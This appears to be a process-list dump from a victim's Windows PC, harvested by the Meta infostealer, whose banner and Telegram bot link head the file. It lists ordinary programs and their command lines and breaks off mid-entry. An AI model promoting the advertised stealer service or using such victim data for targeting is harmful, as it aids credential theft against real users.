Process List

The document lists process information from a Windows system. It includes the process ID, name, and command line for each running process such as explorer.exe, Discord, Steam, and others.

Uploaded by blackcaliber44

***********************************************

* _ _ _ _ *
* / \ / \ / \ / \ *
* ( M | E | T | A ) *
* \_/ \_/ \_/ \_/ *
* *
* Telegram: https://t.me/metastealer_bot *
***********************************************

ID: 740, Name: csrss.exe, CommandLine:


===============
ID: 832, Name: winlogon.exe, CommandLine: winlogon.exe
===============
ID: 996, Name: fontdrvhost.exe, CommandLine: "fontdrvhost.exe"
===============
ID: 1180, Name: dwm.exe, CommandLine: "dwm.exe"
===============
ID: 3280, Name: gameinputsvc.exe, CommandLine: "C:\Program Files (x86)\Microsoft
GameInput\x64\gameinputsvc.exe" Global\GameInputSession_1
===============
ID: 792, Name: RpcDND_Console.exe, CommandLine: "C:\Program Files (x86)\RemotePC\
RpcDND_Console.exe"
===============
ID: 1300, Name: sihost.exe, CommandLine: sihost.exe
===============
ID: 6992, Name: uihost.exe, CommandLine: "C:\Program Files\McAfee\WebAdvisor\
UIHost.exe"
===============
ID: 7000, Name: svchost.exe, CommandLine: C:\WINDOWS\system32\svchost.exe -k
UnistackSvcGroup -s CDPUserSvc
===============
ID: 6728, Name: svchost.exe, CommandLine: C:\WINDOWS\system32\svchost.exe -k
UnistackSvcGroup -s WpnUserService
===============
ID: 5532, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-
A59CA119A75E}
===============
ID: 5216, Name: WiseMemoryOptimzer.exe, CommandLine: "C:\Program Files\Wise\Wise
Memory Optimizer\WiseMemoryOptimzer.exe" -a
===============
ID: 3168, Name: ctfmon.exe, CommandLine: "ctfmon.exe"
===============
ID: 5964, Name: explorer.exe, CommandLine: C:\WINDOWS\Explorer.EXE
===============
ID: 6452, Name: igfxEM.exe, CommandLine: "C:\WINDOWS\System32\DriverStore\
FileRepository\cui_dch.inf_amd64_38cfab2b652e4701\igfxEM.exe"
===============
ID: 7264, Name: svchost.exe, CommandLine: C:\WINDOWS\system32\svchost.exe -k
ClipboardSvcGroup -p -s cbdhsvc
===============
ID: 6592, Name: DSATray.exe, CommandLine: "C:\Program Files (x86)\Intel\Driver and
Support Assistant\DSATray.exe"
===============
ID: 8048, Name: TextInputHost.exe, CommandLine: "C:\WINDOWS\SystemApps\
MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -
ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
===============
ID: 7928, Name: StartMenuExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\
StartMenuExperienceHost.exe" -
ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
===============
ID: 4692, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 8020, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 8440, Name: dllhost.exe, CommandLine: C:\WINDOWS\system32\DllHost.exe
/Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
===============
ID: 8656, Name: svchost.exe, CommandLine: C:\WINDOWS\system32\svchost.exe -k
UnistackSvcGroup
===============
ID: 8600, Name: SecurityHealthSystray.exe, CommandLine: "C:\Windows\System32\
SecurityHealthSystray.exe"
===============
ID: 8552, Name: RtkAudUService64.exe, CommandLine: "C:\Windows\System32\
RtkAudUService64.exe" -background
===============
ID: 9256, Name: IGCCTray.exe, CommandLine: "C:\Program Files\WindowsApps\
AppUp.IntelGraphicsExperience_1.100.3408.0_x64__8j3eq9eme6ctt\
GCP.ML.BackgroundSysTray\IGCCTray.exe"
===============
ID: 9424, Name: Discord.exe, CommandLine: "C:\Users\usuario\AppData\Local\Discord\
app-1.0.9012\Discord.exe"
===============
ID: 8776, Name: Discord.exe, CommandLine: C:\Users\usuario\AppData\Local\Discord\
app-1.0.9012\Discord.exe --type=crashpad-handler --user-data-dir=C:\Users\usuario\
AppData\Roaming\discord /prefetch:7 --no-rate-limit --monitor-self-
annotation=ptype=crashpad-handler --database=C:\Users\usuario\AppData\Roaming\
discord\Crashpad --url=https://sentry.io/api/146342/minidump/?
sentry_key=384ce4413de74fe0be270abe03b2b35a "--annotation=_companyName=Discord
Inc." --annotation=_productName=Discord --annotation=_version=1.0.9012 --
annotation=plat=Win32 --annotation=prod=Electron --annotation=ver=22.3.2 --initial-
client-data=0x4b0,0x4b4,0x4b8,0x4ac,0x4bc,0x84aef78,0x84aef88,0x84aef94
===============
ID: 11204, Name: esrv.exe, CommandLine: "C:\Program Files\Intel\SUR\QUEENCREEK\x64\
esrv.exe" "--start" "--start_options_handle" "1060"
===============
ID: 10100, Name: Discord.exe, CommandLine: "C:\Users\usuario\AppData\Local\Discord\
app-1.0.9012\Discord.exe" --type=gpu-process --user-data-dir="C:\Users\usuario\
AppData\Roaming\discord" --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAA
AAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAA
AOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-
handle=1768 --field-trial-
handle=1740,i,1118569064329134349,5127168284832122066,131072 --disable-
features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
s,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
===============
ID: 11324, Name: Discord.exe, CommandLine: "C:\Users\usuario\AppData\Local\Discord\
app-1.0.9012\Discord.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=es-419 --service-sandbox-type=none --user-
data-dir="C:\Users\usuario\AppData\Roaming\discord" --mojo-platform-channel-
handle=2208 --field-trial-
handle=1740,i,1118569064329134349,5127168284832122066,131072 --disable-
features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
s,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
===============
ID: 12112, Name: Discord.exe, CommandLine: "C:\Users\usuario\AppData\Local\Discord\
app-1.0.9012\Discord.exe" --type=renderer --user-data-dir="C:\Users\usuario\
AppData\Roaming\discord" --app-user-model-id=com.squirrel.Discord.Discord --app-
path="C:\Users\usuario\AppData\Local\Discord\app-1.0.9012\resources\app.asar" --no-
sandbox --no-zygote --autoplay-policy=no-user-gesture-required --lang=es-419 --
device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --time-ticks-
at-unix-epoch=-1681672099186086 --launch-time-ticks=393149627 --mojo-platform-
channel-handle=3352 --field-trial-
handle=1740,i,1118569064329134349,5127168284832122066,131072 --disable-
features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
s,WinRetrieveSuggestionsOnlyOnDemand --enable-node-leakage-in-renderers /prefetch:1
===============
ID: 6300, Name: Discord.exe, CommandLine: "C:\Users\usuario\AppData\Local\Discord\
app-1.0.9012\Discord.exe" --type=utility --utility-sub-
type=audio.mojom.AudioService --lang=es-419 --service-sandbox-type=audio --user-
data-dir="C:\Users\usuario\AppData\Roaming\discord" --mojo-platform-channel-
handle=3792 --field-trial-
handle=1740,i,1118569064329134349,5127168284832122066,131072 --disable-
features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
s,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
===============
ID: 13216, Name: lghub.exe, CommandLine: C:\Program Files\LGHUB\lghub.exe
===============
ID: 8544, Name: lghub_system_tray.exe, CommandLine: "C:\Program Files\LGHUB\
system_tray\lghub_system_tray.exe" --background
===============
ID: 5536, Name: lghub.exe, CommandLine: "C:\Program Files\LGHUB\lghub.exe" --
type=gpu-process --user-data-dir="C:\Users\usuario\AppData\Roaming/lghub" --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAA
AOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-
handle=1816 --field-trial-
handle=2108,i,13892160948214354924,12434179736336477570,131072 --disable-
features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand
/prefetch:2
===============
ID: 6284, Name: lghub.exe, CommandLine: "C:\Program Files\LGHUB\lghub.exe" --
type=utility --utility-sub-type=network.mojom.NetworkService --lang=es-419 --
service-sandbox-type=none --user-data-dir="C:\Users\usuario\AppData\Roaming/lghub"
--mojo-platform-channel-handle=1984 --field-trial-
handle=2108,i,13892160948214354924,12434179736336477570,131072 --disable-
features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand
/prefetch:8
===============
ID: 9780, Name: unsecapp.exe, CommandLine: C:\WINDOWS\system32\wbem\unsecapp.exe -
Embedding
===============
ID: 11260, Name: lghub.exe, CommandLine: "C:\Program Files\LGHUB\lghub.exe" --
type=crashpad-handler --user-data-dir=C:\Users\usuario\AppData\Roaming/lghub
/prefetch:7 --no-rate-limit --monitor-self-annotation=ptype=crashpad-handler --
database=C:\Users\usuario\AppData\Roaming/lghub\Crashpad
--url=https://sentry.io/api/1781306/minidump/?
sentry_key=1acfc2df38074a0f9dcec78020cd4653 "--annotation=_productName=G HUB" --
annotation=_version=2023.3.396302 --annotation=plat=Win64 --
annotation=prod=Electron "--
annotation=sentry___initialScope={\"release\":\"2023.3\",\"environment\":\"Developm
ent\"}" --annotation=ver=20.0.0 --initial-client-
data=0xdac,0xdb0,0xdbc,0xdb8,0xdc0,0x7ff775e89828,0x7ff775e89838,0x7ff775e89848
===============
ID: 12176, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 12532, Name: steam.exe, CommandLine: "C:\Program Files (x86)\Steam\steam.exe"
-- "steam://rungameid/291550"
===============
ID: 12572, Name: steamwebhelper.exe, CommandLine: "C:\Program Files (x86)\Steam\
bin\cef\cef.win7x64\steamwebhelper.exe" "-lang=es_ES" "-cachedir=C:\Users\usuario\
AppData\Local\Steam\htmlcache" "-steampid=12532" "-buildid=1679680416" "-steamid=0"
"-logdir=C:\Program Files (x86)\Steam\logs" "-steamuniverse=Public" "-realm=Global"
"-clientui=C:\Program Files (x86)\Steam\clientui" --enable-media-stream --enable-
smooth-scrolling --enable-direct-write "--log-file=C:\Program Files (x86)\Steam\
logs\cef_log.txt" --disable-quick-menu --disable-features=SameSiteByDefaultCookies
--enable-blink-features=ResizeObserver,Worklet,AudioWorklet --disable-blink-
features=Badging
===============
ID: 8688, Name: steamwebhelper.exe, CommandLine: "C:\Program Files (x86)\Steam\bin\
cef\cef.win7x64\steamwebhelper.exe" --type=crashpad-handler /prefetch:7 --max-
uploads=5 --max-db-size=20 --max-db-age=5 --monitor-self-annotation=ptype=crashpad-
handler "--database=C:\Program Files (x86)\Steam\dumps" "--metrics-dir=C:\Users\
usuario\AppData\Local\CEF\User Data" --url=https://crash.steampowered.com/submit --
annotation=platform=win64 --annotation=product=cefwebhelper --
annotation=version=1679680416 --initial-client-
data=0x3ac,0x3b0,0x3b4,0x388,0x3b8,0x7ffc934ff070,0x7ffc934ff080,0x7ffc934ff090
===============
ID: 1464, Name: steamwebhelper.exe, CommandLine: "C:\Program Files (x86)\Steam\bin\
cef\cef.win7x64\steamwebhelper.exe" --type=gpu-process --field-trial-
handle=1716,16658556173608391926,11029575220954241214,131072 --enable-
features=CastMediaRouteProvider --disable-features=SameSiteByDefaultCookies --log-
file="C:\Program Files (x86)\Steam\logs\cef_log.txt" --product-version="Valve Steam
Client" --lang=es-AR --buildid=1679680416 --steamid=0 --gpu-
preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQ
AAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAA
AGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Program Files
(x86)\Steam\logs\cef_log.txt" --mojo-platform-channel-handle=1724 /prefetch:2
===============
ID: 11336, Name: steamwebhelper.exe, CommandLine: "C:\Program Files (x86)\Steam\
bin\cef\cef.win7x64\steamwebhelper.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --field-trial-
handle=1716,16658556173608391926,11029575220954241214,131072 --enable-
features=CastMediaRouteProvider --disable-features=SameSiteByDefaultCookies --
lang=es-419 --service-sandbox-type=network --log-file="C:\Program Files (x86)\
Steam\logs\cef_log.txt" --product-version="Valve Steam Client" --lang=es-AR --
buildid=1679680416 --steamid=0 --log-file="C:\Program Files (x86)\Steam\logs\
cef_log.txt" --mojo-platform-channel-handle=1592 /prefetch:8
===============
ID: 12400, Name: steamwebhelper.exe, CommandLine: "C:\Program Files (x86)\Steam\
bin\cef\cef.win7x64\steamwebhelper.exe" --type=renderer --log-file="C:\Program
Files (x86)\Steam\logs\cef_log.txt" --field-trial-
handle=1716,16658556173608391926,11029575220954241214,131072 --enable-
features=CastMediaRouteProvider --disable-features=SameSiteByDefaultCookies --
enable-blink-features=ResizeObserver,Worklet,AudioWorklet --disable-blink-
features=Badging --lang=es-419 --log-file="C:\Program Files (x86)\Steam\logs\
cef_log.txt" --product-version="Valve Steam Client" --buildid=1679680416 --
steamid=0 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --
mojo-platform-channel-handle=2512 /prefetch:1
===============
ID: 9524, Name: steamwebhelper.exe, CommandLine: "C:\Program Files (x86)\Steam\bin\
cef\cef.win7x64\steamwebhelper.exe" --type=renderer --log-file="C:\Program Files
(x86)\Steam\logs\cef_log.txt" --field-trial-
handle=1716,16658556173608391926,11029575220954241214,131072 --enable-
features=CastMediaRouteProvider --disable-features=SameSiteByDefaultCookies --
enable-blink-features=ResizeObserver,Worklet,AudioWorklet --disable-blink-
features=Badging --lang=es-419 --log-file="C:\Program Files (x86)\Steam\logs\
cef_log.txt" --product-version="Valve Steam Client" --buildid=1679680416 --
steamid=0 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --
mojo-platform-channel-handle=2876 /prefetch:1
===============
ID: 11788, Name: steamwebhelper.exe, CommandLine: "C:\Program Files (x86)\Steam\
bin\cef\cef.win7x64\steamwebhelper.exe" --type=renderer --log-file="C:\Program
Files (x86)\Steam\logs\cef_log.txt" --field-trial-
handle=1716,16658556173608391926,11029575220954241214,131072 --enable-
features=CastMediaRouteProvider --disable-features=SameSiteByDefaultCookies --
enable-blink-features=ResizeObserver,Worklet,AudioWorklet --disable-blink-
features=Badging --lang=es-419 --log-file="C:\Program Files (x86)\Steam\logs\
cef_log.txt" --product-version="Valve Steam Client" --buildid=1679680416 --
steamid=0 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --
mojo-platform-channel-handle=3288 /prefetch:1
===============
ID: 15064, Name: ApplicationFrameHost.exe, CommandLine: C:\WINDOWS\system32\
ApplicationFrameHost.exe -Embedding
===============
ID: 14624, Name: RtkUWP.exe, CommandLine: "C:\Program Files\WindowsApps\
RealtekSemiconductorCorp.RealtekAudioControl_1.2.175.0_x64__dt26b99r8h8gj\
RtkUWP.exe" -ServerName:App.AppX2vzv616czv2j97f46vn25b5ksjvhr8z1.mca
===============
ID: 15168, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9828, Name: dllhost.exe, CommandLine: C:\WINDOWS\system32\DllHost.exe
/Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
===============
ID: 9020, Name: SearchApp.exe, CommandLine: "C:\WINDOWS\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:ShellFeedsUI.AppX88fpyyrd21w8wqe62wzsjh5agex7tf1e.mca
===============
ID: 14956, Name: ShellExperienceHost.exe, CommandLine: "C:\WINDOWS\SystemApps\
ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -
ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
===============
ID: 7424, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9528, Name: steamwebhelper.exe, CommandLine: "C:\Program Files (x86)\Steam\bin\
cef\cef.win7x64\steamwebhelper.exe" --type=utility --utility-sub-
type=audio.mojom.AudioService --field-trial-
handle=1716,16658556173608391926,11029575220954241214,131072 --enable-
features=CastMediaRouteProvider --disable-features=SameSiteByDefaultCookies --
lang=es-419 --service-sandbox-type=audio --log-file="C:\Program Files (x86)\Steam\
logs\cef_log.txt" --product-version="Valve Steam Client" --lang=es-AR --
buildid=1679680416 --steamid=0 --log-file="C:\Program Files (x86)\Steam\logs\
cef_log.txt" --mojo-platform-channel-handle=3708 /prefetch:8
===============
ID: 4064, Name: Microsoft.Photos.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.Windows.Photos_2022.30070.26007.0_x64__8wekyb3d8bbwe\
Microsoft.Photos.exe" -ServerName:App.AppXzst44mncqdg84v7sv6p7yznqwssy6f7f.mca
===============
ID: 3692, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 15820, Name: CompPkgSrv.exe, CommandLine: C:\Windows\System32\CompPkgSrv.exe -
Embedding
===============
ID: 18868, Name: rundll32.exe, CommandLine: "C:\WINDOWS\system32\rundll32.exe" -
localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617
===============
ID: 14532, Name: SearchApp.exe, CommandLine: "C:\WINDOWS\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
===============
ID: 13724, Name: steamwebhelper.exe, CommandLine: "C:\Program Files (x86)\Steam\
bin\cef\cef.win7x64\steamwebhelper.exe" --type=renderer --log-file="C:\Program
Files (x86)\Steam\logs\cef_log.txt" --field-trial-
handle=1716,16658556173608391926,11029575220954241214,131072 --enable-
features=CastMediaRouteProvider --disable-features=SameSiteByDefaultCookies --
enable-blink-features=ResizeObserver,Worklet,AudioWorklet --disable-blink-
features=Badging --lang=es-419 --log-file="C:\Program Files (x86)\Steam\logs\
cef_log.txt" --product-version="Valve Steam Client" --buildid=1679680416 --
steamid=0 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --
mojo-platform-channel-handle=3204 /prefetch:1
===============
ID: 5004, Name: lghub_agent.exe, CommandLine: "C:\Program Files\LGHUB\
lghub_agent.exe"
===============
ID: 1188, Name: logi_crashpad_handler.exe, CommandLine: "C:\Program Files\LGHUB\
logi_crashpad_handler.exe" --no-rate-limit --database=C:\Users\usuario\AppData\
Local\LGHUB\sentry_db_lghub_agent --metrics-dir=C:\Users\usuario\AppData\Local\
LGHUB\sentry_db_lghub_agent --url=https://sentry.io:443/api/1779200/minidump/?
sentry_client=sentry.native/0.4.14&sentry_key=91ca51384751442380bd8987a6be91ab --
attachment=C:\ProgramData\LGHUB\installation.json --attachment=C:\ProgramData\
LGHUB\next.json --attachment=C:\ProgramData\LGHUB\current.json --attachment=C:\
Users\usuario\AppData\Local\LGHUB\settings.db --attachment=C:\Users\usuario\
AppData\Local\LGHUB\sentry_db_lghub_agent\e42647a0-0987-456d-1d51-be60b6731bb4.run\
__sentry-event --attachment=C:\Users\usuario\AppData\Local\LGHUB\
sentry_db_lghub_agent\e42647a0-0987-456d-1d51-be60b6731bb4.run\__sentry-breadcrumb1
--attachment=C:\Users\usuario\AppData\Local\LGHUB\sentry_db_lghub_agent\e42647a0-
0987-456d-1d51-be60b6731bb4.run\__sentry-breadcrumb2 --initial-client-
data=0x908,0x910,0x914,0x8dc,0x900,0x7ff702c8b4d0,0x7ff702c8b4f0,0x7ff702c8b508
===============
ID: 6632, Name: EpicGamesLauncher.exe, CommandLine: "C:\Program Files (x86)\Epic
Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe"
===============
ID: 22852, Name: EpicWebHelper.exe, CommandLine: "C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/Win64/EpicWebHelper.exe" --type=gpu-process --field-
trial-handle=2028,3678894215680697791,11844017225311339794,131072 --disable-
features=CalculateNativeWinOcclusion --no-sandbox --locales-dir-path="C:/Program
Files (x86)/Epic
Games/Launcher/Engine/Binaries/ThirdParty/CEF3/Win64/Resources/locales" --log-
file=C:/Users/usuario/AppData/Local/EpicGamesLauncher/Saved/Logs/cef3.log --log-
severity=warning --resources-dir-path="C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/ThirdParty/CEF3/Win64/Resources" --user-agent-
product="EpicGamesLauncher/14.7.1-24660660+++Portal+Release-Live
UnrealEngine/4.27.0-24660660+++Portal+Release-Live Chrome/90.0.4430.212" --lang=es-
MX --gpu-
preferences=SAAAAAAAAADgACAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAA
AAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIA
AAAAAAAAAgAAAAAAAAA
--log-file=C:/Users/usuario/AppData/Local/EpicGamesLauncher/Saved/Logs/cef3.log --
mojo-platform-channel-handle=2084 /prefetch:2
===============
ID: 23864, Name: EpicWebHelper.exe, CommandLine: "C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/Win64/EpicWebHelper.exe" --type=utility --utility-
sub-type=network.mojom.NetworkService --field-trial-
handle=2028,3678894215680697791,11844017225311339794,131072 --disable-
features=CalculateNativeWinOcclusion --lang=es-419 --service-sandbox-type=none --
no-sandbox --locales-dir-path="C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/ThirdParty/CEF3/Win64/Resources/locales" --log-
file=C:/Users/usuario/AppData/Local/EpicGamesLauncher/Saved/Logs/cef3.log --log-
severity=warning --resources-dir-path="C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/ThirdParty/CEF3/Win64/Resources" --user-agent-
product="EpicGamesLauncher/14.7.1-24660660+++Portal+Release-Live
UnrealEngine/4.27.0-24660660+++Portal+Release-Live Chrome/90.0.4430.212" --lang=es-
MX --log-file=C:/Users/usuario/AppData/Local/EpicGamesLauncher/Saved/Logs/cef3.log
--mojo-platform-channel-handle=2592 /prefetch:8
===============
ID: 24212, Name: EpicWebHelper.exe, CommandLine: "C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/Win64/EpicWebHelper.exe" --type=renderer --no-
sandbox --log-file=C:/Users/usuario/AppData/Local/EpicGamesLauncher/Saved/Logs/
cef3.log --field-trial-handle=2028,3678894215680697791,11844017225311339794,131072
--disable-features=CalculateNativeWinOcclusion --lang=es-419 --locales-dir-
path="C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/ThirdParty/CEF3/Win64/Resources/locales" --log-
file=C:/Users/usuario/AppData/Local/EpicGamesLauncher/Saved/Logs/cef3.log --log-
severity=warning --resources-dir-path="C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/ThirdParty/CEF3/Win64/Resources" --user-agent-
product="EpicGamesLauncher/14.7.1-24660660+++Portal+Release-Live
UnrealEngine/4.27.0-24660660+++Portal+Release-Live Chrome/90.0.4430.212" --device-
scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-
code-mitigations --mojo-platform-channel-handle=2744 /prefetch:1
===============
ID: 24220, Name: EpicWebHelper.exe, CommandLine: "C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/Win64/EpicWebHelper.exe" --type=renderer --no-
sandbox --log-file=C:/Users/usuario/AppData/Local/EpicGamesLauncher/Saved/Logs/
cef3.log --field-trial-handle=2028,3678894215680697791,11844017225311339794,131072
--disable-features=CalculateNativeWinOcclusion --lang=es-419 --locales-dir-
path="C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/ThirdParty/CEF3/Win64/Resources/locales" --log-
file=C:/Users/usuario/AppData/Local/EpicGamesLauncher/Saved/Logs/cef3.log --log-
severity=warning --resources-dir-path="C:/Program Files (x86)/Epic
Games/Launcher/Engine/Binaries/ThirdParty/CEF3/Win64/Resources" --user-agent-
product="EpicGamesLauncher/14.7.1-24660660+++Portal+Release-Live
UnrealEngine/4.27.0-24660660+++Portal+Release-Live Chrome/90.0.4430.212" --device-
scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-
code-mitigations --mojo-platform-channel-handle=2752 /prefetch:1
===============
ID: 22632, Name: PhoneExperienceHost.exe, CommandLine: "C:\Program Files\
WindowsApps\Microsoft.YourPhone_1.22092.211.0_x64__8wekyb3d8bbwe\
PhoneExperienceHost.exe" -ComServer:Background -Embedding
===============
ID: 30600, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --profile-directory="Profile 4"
===============
ID: 32296, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\usuario\
AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-
annotation=ptype=crashpad-handler "--database=C:\Users\usuario\AppData\Local\
Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\usuario\AppData\Local\
Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --
annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --
annotation=ver=107.0.5304.108 --initial-client-
data=0x110,0x114,0x118,0xec,0xc,0x7ffc1b949e68,0x7ffc1b949e78,0x7ffc1b949e88
===============
ID: 31804, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=gpu-process --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAA
AAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAA
AOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-
handle=1692 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:2
===============
ID: 31156, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=es-419 --service-sandbox-type=none --mojo-
platform-channel-handle=1936 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:8
===============
ID: 32112, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-
type=storage.mojom.StorageService --lang=es-419 --service-sandbox-type=utility --
mojo-platform-channel-handle=2284 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:8
===============
ID: 30968, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=renderer --display-capture-permissions-policy-
allowed --first-renderer-process --lang=es-419 --device-scale-factor=1 --num-
raster-threads=1 --renderer-client-id=6 --time-ticks-at-unix-epoch=-
1681672103653583 --launch-time-ticks=256085560677 --mojo-platform-channel-
handle=3220 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:1
===============
ID: 32748, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=renderer --extension-process --display-capture-
permissions-policy-allowed --lang=es-419 --device-scale-factor=1 --num-raster-
threads=1 --renderer-client-id=7 --time-ticks-at-unix-epoch=-1681672103653583 --
launch-time-ticks=256086652253 --mojo-platform-channel-handle=4528 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:1
===============
ID: 18472, Name: cmd.exe, CommandLine: C:\WINDOWS\system32\cmd.exe /d /c "C:\
Program Files\McAfee\WebAdvisor\BrowserHost.exe"
chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/ --parent-window=0 < \\.\pipe\
chrome.nativeMessaging.in.f6a8ba1a88dfcd5a > \\.\pipe\
chrome.nativeMessaging.out.f6a8ba1a88dfcd5a
===============
ID: 31964, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 28668, Name: cmd.exe, CommandLine: C:\WINDOWS\system32\cmd.exe /d /c "C:\
Program Files\McAfee\WebAdvisor\BrowserHost.exe"
chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/ --parent-window=0 < \\.\pipe\
chrome.nativeMessaging.in.c416c07d4f912804 > \\.\pipe\
chrome.nativeMessaging.out.c416c07d4f912804
===============
ID: 22096, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 30824, Name: browserhost.exe, CommandLine: "C:\Program Files\McAfee\WebAdvisor\
BrowserHost.exe" chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/ --parent-
window=0
===============
ID: 29924, Name: browserhost.exe, CommandLine: "C:\Program Files\McAfee\WebAdvisor\
